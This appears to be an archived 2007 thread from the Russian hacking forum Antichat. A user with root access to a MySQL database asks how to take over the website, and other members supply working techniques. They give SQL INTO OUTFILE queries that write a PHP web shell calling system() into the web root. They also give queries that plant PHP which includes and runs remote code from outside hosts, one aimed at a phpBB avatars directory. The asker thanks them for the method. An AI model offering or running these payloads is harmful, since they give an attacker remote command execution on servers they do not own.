Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.07.2007, 14:49
|
|
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346
Репутация:
-24
|
|
MySQL и root доступ
народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?
|
|
|
15.07.2007, 15:06
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
все зависит от твоей цели, если нужен сайт, то залей шелл.
|
|
|
|
15.07.2007, 15:06
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)
|
|
|
|
15.07.2007, 15:33
|
|
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346
Репутация:
-24
|
|
народ вы меня видимо немножко не так поняли...
У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
есть какиенибудь мыслишки?
|
|
|
|
15.07.2007, 15:40
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
Последний раз редактировалось Ni0x; 15.07.2007 в 15:43..
|
|
|
|
15.07.2007, 15:43
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
я понял что ему надо.
ему надо через бд залить шелл.
Ты говориш что нет скриптов какие работают с бд.
такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
Гдето на форуме писали что через команду мускула льёться шелл.
поиши что то типа Шелл через бд или в этом роде
|
|
|
|
15.07.2007, 15:47
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';
|
|
|
|
15.07.2007, 15:51
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Вот был пример с пхп ББ
|
|
|
|
15.07.2007, 15:56
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
Это если filepriv включен =)
и есть права на запись в папку
Последний раз редактировалось ENFIX; 15.07.2007 в 15:58..
|
|
|
|
15.07.2007, 16:49
|
|
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346
Репутация:
-24
|
|
всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';
отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
